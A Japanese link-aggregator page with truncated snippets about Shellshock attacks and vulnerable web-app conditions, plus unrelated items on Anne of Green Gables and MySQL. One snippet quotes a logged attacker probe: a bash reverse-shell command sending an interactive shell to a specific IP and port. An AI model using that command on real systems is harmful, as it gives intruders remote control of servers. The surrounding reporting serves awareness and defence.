ログミーBiz英語習得の近道は、ChatGPTで“自分で教材を作る”こと 『英語は10000時間でモノになる』著者がすすめる学習法
ファイアウォール内のサーバに対するShellshockを利用した攻撃 - 葉っぱ日記
2014-09-27: 該当サイト上にXSSがなくても攻撃可能であることが id:mayuki さんのコメントで判明しましたので全面的に書き直しました。ファイアウォール内であっても攻撃者はファイアウォール内のShellshock攻撃が通用するCGIのURLがわかっているだけで攻撃可能ですので早急に対応が必要です!会社のブログにも書いてますが、ファイアウォール内に置いてあるサーバで攻撃者が直接アクセスできないからといってbashの更新を怠っていると、条件によっては攻撃が可能となります。 条件としては、 そのサーバにはシェルを経由して外部コマンドを起動するCGI等が動いている(通常のShellshockの攻撃と同条件) 攻撃者がそのURLを事前に知っている(あるいは推測可能) となります。 攻撃者は、ユーザーを罠URLへ誘導し、以下のようなJavaScriptを罠ページ上で動かし、攻撃対象のW
ウェブアプリにおけるBash脆弱性の即死条件 #ShellShock - めもおきば
条件1. /bin/shの実体がbashのディストリビューション RHEL CentOS Scientific Linux Fedora Amazon Linux openSUSE Arch Linux (自ら設定した場合: Debian, Ubuntu) 条件2. 動作環境 CGI (レンタルサーバでありがちなCGIモードのPHP等も含む) Passenger(Ruby) 条件3. プログラム内容 Passengerは全死亡 *1 systemや `command`、 '| /usr/lib/sendmail' などで外部コマンド実行 *2 PHPのmailやmb_send_mail、その他フレームワーク等を介したメール送信 *3 以下は条件1が不要 明示的にbashを呼ぶ 先頭で #!/bin/bash や #!/usr/bin/env bash しているプログラムを実行 (rbenv
/dev/tcpによるbashのソケット通信
件のbashの脆弱性が残っていることを期待したアクセスについて、24時間ほど前には来てなかったんですが、さきほどログを見てみたらちょっとだけ来てました。 ログに残るのは User-Agent ぐらいなのですが、ほかのフィールドで試している輩もいることでしょう。 アクセス元を逆引きしてみたんですが、クラウドサービスばっかりでした(一個だけ shodan.io なるドメインの下のIPアドレスからあったのだけど、なんだろう……)。 さて、() { :;}; の後になにをやってるのか、というのなんですが、一つ THIS IS VULNERABLE と echo するだけという人がいました。警告のつもりなのか、手動で何か確認しているのかな。あとはpingだな……と思ってたんですが、ちょっと特異なものが。 /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
本日最終回「花子とアン」村岡花子はなぜ『赤毛のアン』の重要場面を翻訳しなかったのか - エキサイトニュース
アハもじゃの社長さんのおかげで『赤毛のアン』が出版されることになり大団円の『花子とアン』。 実は、村岡花子の訳した『赤毛のアン』には、大きな謎がある。 第37章、最後からひとつ前の章。 マシュウが心臓発作で死んでしまう。 その晩、残されたマリラはアンに、いかに自分がアンを愛しているかを語る。 このシーンを、村岡花子は訳していないのだ。 村岡花子訳『赤毛のアン』では、こうなっている。 “その声を聞きつけたマリラが部屋にはいってきた。 二人はともに泣き、心から語りあい、慰めあった。 二日たってから、マシュウ・クスバートは彼が耕した畑やたいせつに育てた果樹園を通って運ばれていった。” (赤毛のアン』村岡花子訳・新潮文庫・昭和六十一年四月三十日七十四刷P376) この部分、原文ではこうである。 Marilla heard her and crept in to comfort her. "Ther
MySQL 5.7.5で実装された オンラインでのInnoDBバッファプールサイズ変更(サイズ拡大編)
MySQL 5.7.5の新機能。 ログ貼ってたら長くなったので、バッファプールサイズを小さくするのは別エントリーへ。 理屈的には、 - バッファプールを大きくするとき * innodb_buffer_pool_chunk_size ごとに新しいページを確保しながらゴニョゴニョやる * この処理中は *バッファプールへの全てのアクセスがブロックされるよ* - バッファプールを小さくするとき * innodb_buffer_pool_chunk_size ごとにページを追い出しながらゴニョゴニョやる らしい。 http://dev.mysql.com/doc/refman/5.7/en/innodb-buffer-pool-online-resize.html しかしバッファプール大きくする時の動作はInnoDBのトラフィック全滅ですか使えNEEEE とか、「オンラインでバッファプールサイズを
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
